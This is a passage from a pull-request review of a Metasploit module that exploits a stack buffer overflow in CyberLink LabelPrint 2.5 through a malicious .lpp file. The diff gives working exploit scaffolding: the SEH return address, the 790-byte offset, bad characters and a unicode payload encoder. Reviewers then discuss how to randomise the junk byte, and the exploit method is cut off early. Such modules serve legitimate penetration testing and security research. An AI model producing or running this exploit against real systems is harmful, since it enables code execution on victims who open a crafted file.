modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb

```diff
@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+       via open file menu. This results in overwriting a structured exception handler record and take over the
+       application. This module has been tested on Windows 7x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
+          'f3ci <marie@spentera.id>'            # unicode kungfu
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-14627' ],
+          [ 'EDB', '42777' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          ['CyberLink LabelPrint <= 2.5 (Win 7x64)', { 'Ret' => "\x2c\x44", 'Offset' => 790 } ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 15000,
+          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.
+          'DisableNops' => true
+        },
+      'DisclosureDate'  => 'Sep 23 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
+    ])
+  end
+
+  def get_payload(hunter)
+
+    [ 'x86/unicode_mixed' ].each { |name|
+      enc = framework.encoders.create(name)
+      if name =~ /unicode/
+        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+        hunter = enc.encode(hunter, nil, nil, platform)
+      end
+    }
+
+    return hunter
+  end
+
+  def exploit
+    nop = "\x42"
+    junk = "\x41"              #junk must specifically static, put A as example
```

Comment:
Presumably the junk byte has to be the same in every instance? Is the actual byte important? You could use:

```suggestion
    junk = rand_text_alpha(1)
```

Reply:
Hi bcoles, thanks for this suggestion, I'll try it and apply on the next commit.

Reply:
After several tried.. they're only \x41, \x42, and \x43 that fit the buffer without any crash. Any idea on how to force to use those chars instead of specify it in a static variable?

Reply:
Presumably there's probably more going on here, related to unicode. Perhaps @jrobles-r7 can offer some advice.

As for `\x41, \x42, \x43`, you could do this:

```suggestion
    junk = 'ABC'.split('').sample
```

```
2.3.0 :001 > 'ABC'.split('').sample
 => "A" 
2.3.0 :002 > 'ABC'.split('').sample
 => "B" 
2.3.0 :003 > 'ABC'.split('').sample
 => "B" 
2.3.0 :004 > 'ABC'.split('').sample
 => "C" 
2.3.0 :005 > 'ABC'.split('').sample
 => "B" 
2.3.0 :006 > 'ABC'.split('').sample
 => "C" 
2.3.0 :007 > 
```

Reply:
This works perfectly. Thanks !